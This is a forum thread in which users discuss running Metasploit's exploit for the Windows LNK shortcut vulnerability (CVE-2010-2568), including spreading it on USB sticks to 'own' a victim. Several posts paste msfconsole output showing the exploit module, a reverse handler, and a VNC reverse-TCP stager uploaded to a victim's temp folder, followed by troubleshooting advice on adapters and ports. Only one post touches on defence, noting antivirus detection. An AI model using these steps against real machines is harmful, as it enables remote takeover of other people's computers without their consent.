Thread moved from beginner section to here.
I've posted a new blog about the Windows LNK vulnerability (CVE-2010-2568) and how you can protect yourself or customers against this vuln.
Metasploit released an exploit for it in the newest revision.
In the video i just show how to use the browser way but you can also put the files on a USB Stick and own you victim this way.
Last edited by hardez; 03-24-2011 at 05:33 AM.
Thread moved from beginner section to here.
autoplay feature is disabled by default in Windows 7 so with lnk file using desktop.ini doesn't work
I tested this on two PCs with Win7
win7 is vulnerable to this exploit but didn't work for me
I thought that this is the "new" and "dangerous" thing about this exploit that you don't need any autostart options 'cause Windows have a flaw in how it interprets the icon of the file!
So that it's executed as soon as Windows trys to load the icon of the link!
Last edited by hardez; 07-20-2010 at 07:49 PM.
Excuse my noob-ness, but the original post indicates towards some files you can put on a USB stick to execute this vulnerability, where might one find such files? Or are they included with Metasploit and located somewhere in the Metasploit directory?
PS: Mods can i post a link with technical information? It' not of my authorship
Just watched your video and tried to reproduce it but I i'm missing something.
I can almost complete the exploit but it binds to my external card as an endpoint
So I tihnk the problem is that it is binding to my physical address and not to my vbox addressCode:meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=10.0.0.95 LPORT=4545)[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\mUCfWD.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 10.0.0.95:4545...
So I changed the srvhost in options to 192.168.56.1
but then I get
Sorry if this is in the wrong section, but it was in the noobs section, and I know this is certainly a noob question so i'm not sure..... any help would be appreciatedCode:msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.56.1 srvhost => 192.168.56.1 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job. [-] Handler failed to bind to 192.168.56.1:4444 [-] Handler failed to bind to 0.0.0.0:4444 [-] Exploit exception: The address is already in use (0.0.0.0:4444).
oh yes - I can open a vnc session no problems using the run one_vnc.rb exploit, so I guess I have the right software?
Hi Hardez, Great video I just have a couple of questions - they are noob questions but since the video was moved here I'd still like to ask.
I'm following the exploit but instead of launching the exploit and binding to my Vbox adapter the exploit listens on my physical adapter on a different subnet, so I can't trigger the vulnerability.
I tried to change the srvhost in options but still no go!
here's what I tried
So my question is howto change the local ip from 10.0.0.95:80 to 192.168.56.1:80?Code:msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.56.1:4444 [*] [*] Send vulnerable clients to \\10.0.0.95\KfTO\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: http://0.0.0.0:80/[*] Local IP: http://10.0.0.95:80/[*] Server started.
I really appreciate the video and any feedback it would probably help other noobs too.
Also once the vuln is executed does that automatically start a vnc viewer like the one_vnc.rb exploit?
Last edited by lupin; 07-21-2010 at 07:26 AM. Reason: Merging...
@Onemajorflaw no need to excuse
like ravbyte said it doesn't matter wether you switch autostart on or off 'cause windows executes the exploit as soon as it finds the lnk file and thats in the moment you plug in the USB Drive.
The Video and the Metasploit version of this exploit is designed for exploiting by WebDav but there is a version (the original one for example) that is designt for USB.
I already asked HD Moore (coder of Metasploit) wether there will be a version for USB but he don't answered till now.
But you can run the exploit, open the WebDav from within Backtrack and copy the files to USB the only thing you have do do is keep running msfconsole till someone connects.
What I understand is that you run Backtrack in a VM right? And the IP of BT is 192.168.56.1? But it binds to 10blabla?
Is the Nic of the VM in bridged mode?
If not do so cause else VMware/VirtualBox doing NAT and I don't know whether this works or not with Metasploit.
To flaw #2 Metasploit can only bind one Port a session. So try another port like 4443 or restart metasploit then it should work
Sorry for the double post, but no one has been posting here!
I successfully executed this exploit on a Windows 7 machine, but the only problem is a session is never opened. The lnk and dll file are opened on the victim PC, and on my BackTrack machine it shows someone connecting, and its shows the requests being sent, and recieved, but nothing happens after that. Any suggestions?
Last edited by Archangel-Amael; 07-29-2010 at 11:07 AM.
Actually this exploit is deceted by Microsoft Essentials and Avira Antivir. I just tested this two programs with the newest definitions.
Without them the attack was succesfully.